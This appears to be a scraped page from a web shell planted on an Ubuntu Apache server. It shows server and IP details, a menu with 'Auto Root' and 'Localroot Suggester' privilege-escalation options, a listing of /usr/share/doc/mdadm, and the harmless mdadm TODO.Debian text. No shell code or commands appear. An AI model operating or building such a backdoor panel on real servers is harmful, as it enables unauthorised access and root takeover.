Linux jobworks 6.8.0-136-generic #136-Ubuntu SMP PREEMPT_DYNAMIC Wed Jul 1 21:53:05 UTC 2026 x86_64
Apache/2.4.58 (Ubuntu)
Server IP : 10.0.1.5 & Your IP : 216.73.217.52
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
mdadm /
Delete
Unzip
Name
Size
Permission
Date
Action
examples
[ DIR ]
drwxr-xr-x
2025-08-05 17:14
FAQ.gz
10.98
KB
-rw-r--r--
2025-08-05 17:14
README.checkarray
1.63
KB
-rw-r--r--
2025-08-05 17:14
README.recipes.gz
1.93
KB
-rw-r--r--
2025-08-05 17:14
TODO.Debian
1.21
KB
-rw-r--r--
2025-08-05 17:14
TODO.gz
3.02
KB
-rw-r--r--
2025-08-05 17:14
changelog.Debian.gz
7.72
KB
-rw-r--r--
2024-07-29 08:06
copyright
1.29
KB
-rw-r--r--
2024-07-29 08:06
external-reshape-design.txt.gz
4.82
KB
-rw-r--r--
2025-08-05 17:14
mdmon-design.txt.gz
2.5
KB
-rw-r--r--
2025-08-05 17:14
Save
Rename
debian mdadm TODO list ====================== - version-1 is a nightmare. E.g. on partitionable arrays, with / on /dev/md_d0p3, mdadm -Es ignores /dev/md_d0 and just uses the name, so /dev/md/<arrayname>. - figure out something about device names. - (better) udev integration - check whether mdadm.conf and system are consistent during initramfs creation and fail otherwise (#381303). - add code to compare existing and expected configuration, after standardising the files. In most cases, we'll have to answer DUNNO as to whether the existing configuration file is okay, but I guess in some cases we can determine that the configuration is okay. A conservative approach would be beneficial to the user. Not sure if it's worth the effort though. - one nice^W important thing would be to check device names and UUIDs at least. - verify operation without udev - udev removed before mdadm installed - udev removed after mdadm installed - more granular handling of init.d starts/stops, don't force all arrays to be started. - let user specify when to start/stop which array (#398310). - also only stop those array we started; this can be easily done with sentinels in $STATEDIR - manage DAEMON_OPTIONS with debconf